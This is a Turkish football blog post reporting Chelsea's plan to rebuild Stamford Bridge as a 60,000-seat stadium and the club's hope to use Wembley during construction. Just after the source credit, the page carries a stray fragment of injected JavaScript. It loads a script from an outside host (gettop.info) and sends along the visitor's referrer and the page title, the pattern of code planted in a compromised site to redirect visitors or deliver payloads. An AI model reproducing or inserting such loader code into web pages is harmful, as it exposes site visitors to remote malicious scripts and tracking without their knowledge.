Yeni Stamford Bridge

re3

Gelişen teknoloji ve endüstriyel futbolun gereklilikleri göz önünde bulundurulduğunda futbolun en önemli unsurlarından stadyumların da futbola ait diğer tüm bileşenler gibi yoğun bir değişim ve yenilenme sürecine girmesi su götürmez bir gerçek.
re1

Tam da bu noktada Chelsea kulübü de artık kendilerine 110 yıldır ev sahipliği yapan, Londra’nın Fulham bölgesinde yer alan 41.600 kapasiteli Stamford Bridge Stadyumunu yenileme kararı aldı ve bir proje sundu. Yeni stadyumun nereye yapılacağı konusunda bir dönem farklı düşünceler olsa da yer değişikliği olmaması uygun görüldü.

re2

Kendisini çevreleyen 264 tuğla sütunuyla gerçekten çok ilginç bir mimariye sahip olan ve 60.000 kapasiteli yeni stadyumun 2020 yılına kadar tamamlanması ve maliyetinin 600 Milyon Pound civarında olması bekleniyor.  Tüm finansman kulübün sahibi Rus milyarder Roman Abramovich tarafından sağlanacak. Taraftarlardan gelen yoğun isteklere göre tribün isimleri ve oturma planı konusunda değişiklik yapılmayacak ve bir İngiliz klasiği olan taraftarların sahaya yakınlığı da yeni yapılacak stadyumda yine aynı şekilde korunacak.

re3

3-4 yıllık bir yenilenme sürecine girecek olan Stamford Bridge’den bu periyotta ayrı kalacak olan Chelsea kulübü bu süreçte maçlarını Wembley Stadyumu’nda oynamak istiyor. Bu konuda da İngiltere Futbol Federasyonu ile görüşmeler yapıldı ve önemli bir yol katedildi. Wembley’de oynamak çok kolay değil zira stadını yenileme sürecine girecek olan diğer bir Londra takımı Tottenham Hotspur da Wembley’de oynamak istiyor. Chelsea’nin stat kirası için yıllık 15 Milyon Pound ödemesi bekleniyor ve görünen o ki Tottenham ve Chelsea ligdeki çekişmelerini sürdürerek Wembley’de oynama konusunda da birbirlerine rakip olacaklar.

Kaynak : Dailymail

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

adet yorum. Siz de yorumunuzu aşağı yazabilirsiniz.

Yazar: Futbol Akademi

info@futbolakademi.net

Paylaş